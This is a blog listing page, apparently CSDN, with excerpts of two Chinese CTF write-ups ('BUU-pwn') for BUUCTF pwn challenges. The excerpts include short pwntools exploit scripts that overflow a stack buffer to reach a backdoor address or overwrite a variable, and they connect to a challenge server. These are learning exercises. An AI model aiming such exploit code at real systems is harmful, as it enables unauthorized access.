- 博客(9)
- 收藏
- 关注
RSS订阅原创 BUU-pwn(二)
ciscn_2019_n_832位程序,逻辑很简单 需要var[13] == 17需要注意的是qword全称是Quad Word。2个字节就是1个Word(1个字,16位),q就是英文quad-这个词根(意思是4)的首字母,所以它自然是word(2字节,0~2^16-1)的四倍,8字节 所以用p64expfrom pwn import *r = remote('node4.buuoj.cn',29396)payload = b'aaaa'*13+p64(0x11)r.sendline(p
2022-04-27 13:57:43
448
原创 BUU-pwn(一)
rip简单栈溢出,后门函数expfrom pwn import *#io=process("./pwn")r = remote('node4.buuoj.cn',25253)payload=b'a'*0xf+b'a'*0x08+p64(0x0401187)r.sendline(payload)r.interactive()warmup_csaw_2016后门函数 int sub_40060D() 泄露地址expfrom pwn import *#io=process("./pw
2022-04-24 00:40:45
424
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人